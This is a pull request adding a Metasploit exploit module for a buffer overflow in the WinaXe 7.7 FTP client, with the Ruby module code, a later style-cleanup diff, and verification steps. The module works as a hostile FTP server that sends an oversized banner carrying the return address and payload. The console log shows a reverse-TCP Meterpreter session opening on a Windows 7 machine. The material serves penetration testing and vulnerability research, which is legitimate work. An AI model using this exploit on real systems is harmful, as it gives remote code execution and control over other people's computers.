### PR TITLE
Added WinaXe 7.7 FTP client Server Ready buffer overflow

### DIFF
--- a/modules/exploits/windows/ftp/winaxe_server_ready.rb
+++ b/modules/exploits/windows/ftp/winaxe_server_ready.rb
@@ -1,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::FtpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WinaXe 7.7 FTP Client Remote Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow in the WinaXe 7.7 FTP client.
+        This issue is triggered when a client connects to the server and is
+        expecting the Server Ready response.
+      },
+      'Author' =>
+        [
+          'Chris Higgins',  # msf Module -- @ch1gg1ns
+          'hyp3rlix'        # Original discovery
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '40693'],
+          [ 'URL', 'http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt' ], # Put this in later
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Payload'        =>
+        {
+          'Space'    => 1000,
+          'BadChars' => "\x00\x0a\x0d",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows Universal', { 
+              'Offset' => 2065,
+              'Ret' => 0x68017296} ], # push esp # ret 0x04 WCMDPA10.dll
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Nov 03 2016',
+      'DefaultTarget'  => 0))
+  end
+
+  def setup
+    super
+  end
+
+  def on_client_unknown_command(c,cmd,arg)
+    c.put("200 OK\r\n")
+  end
+
+  #def on_client_command_list(c,arg)
+  def on_client_connect(c)
+      print_status("Client connected...")
+
+      sploit =  rand_text(target['Offset'])
+      sploit << [target.ret].pack('V')
+      sploit << make_nops(10)
+      sploit << payload.encoded
+      sploit << make_nops(20)
+
+      print_status("Sending exploit")
+      c.put("220" + sploit + "\r\n")
+      c.close
+      return
+  end
+
+end

--- a/modules/exploits/windows/ftp/winaxe_server_ready.rb
+++ b/modules/exploits/windows/ftp/winaxe_server_ready.rb
@@ -25,23 +25,26 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'EDB', '40693'],
-          [ 'URL', 'http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt' ], # Put this in later
+          [ 'URL', 'http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt' ]
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
         },
       'Payload'        =>
         {
           'Space'    => 1000,
-          'BadChars' => "\x00\x0a\x0d",
+          'BadChars' => "\x00\x0a\x0d"
         },
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows Universal', { 
+          [ 'Windows Universal',
+            {
               'Offset' => 2065,
-              'Ret' => 0x68017296} ], # push esp # ret 0x04 WCMDPA10.dll
+              'Ret' => 0x68017296 # push esp # ret 0x04 WCMDPA10.dll
+            }
+          ]
         ],
       'Privileged'     => false,
       'DisclosureDate' => 'Nov 03 2016',
@@ -52,11 +55,10 @@ class MetasploitModule < Msf::Exploit::Remote
     super
   end
 
-  def on_client_unknown_command(c,cmd,arg)
+  def on_client_unknown_command(c, _cmd, _arg)
     c.put("200 OK\r\n")
   end
 
-  #def on_client_command_list(c,arg)
   def on_client_connect(c)
       print_status("Client connected...")
 
@@ -66,10 +68,8 @@ class MetasploitModule < Msf::Exploit::Remote
       sploit << payload.encoded
       sploit << make_nops(20)
 
-      print_status("Sending exploit")
       c.put("220" + sploit + "\r\n")
       c.close
-      return
   end
 
 end


### PR DESCRIPTION
Adding a buffer overflow exploit for WinaXe 7.7 FTP client for Microsoft Windows. This module is porting a PoC exploit which can be found on the [Exploit DB page](https://www.exploit-db.com/exploits/40693/).

This is a pretty simple port, please let me know if there's anything that I should add on or change!

## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/windows/ftp/winaxe_server_ready`
- [x] Set your payload. For example `set payload windows/meterpreter/reverse_tcp`
- [x] Set LHOST to your local address
- [x] `exploit`
- [x] In the FTP client, enter in connection details and wait for the FTP connection to be made and exploit triggers
- [x] **Verify** payload completes

```
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.12.39-dev-c153686                 ]
+ -- --=[ 1598 exploits - 909 auxiliary - 274 post        ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/windows/ftp/winaxe_server_ready_bof 
msf exploit(winaxe_server_ready_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(winaxe_server_ready_bof) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf exploit(winaxe_server_ready_bof) > show options

Module options (exploit/windows/ftp/winaxe_server_ready_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASVPORT  0                no        The local PASV data port to listen on (0 is random)
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   21               yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.1         yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf exploit(winaxe_server_ready_bof) > run
[*] Exploit running as background job.
msf exploit(winaxe_server_ready_bof) > 
[*] Started reverse TCP handler on 10.0.0.1:4444 
[*] Server started.

msf exploit(winaxe_server_ready_bof) > 
[*] Client connected...
[*] Sending exploit
[*] Sending stage (957999 bytes) to 10.0.0.128
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49325) at 2016-11-06 23:17:51 -0600

msf exploit(winaxe_server_ready_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : WIN7X86
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getuid 
Server username: win7x86\chiggins
meterpreter > exit

```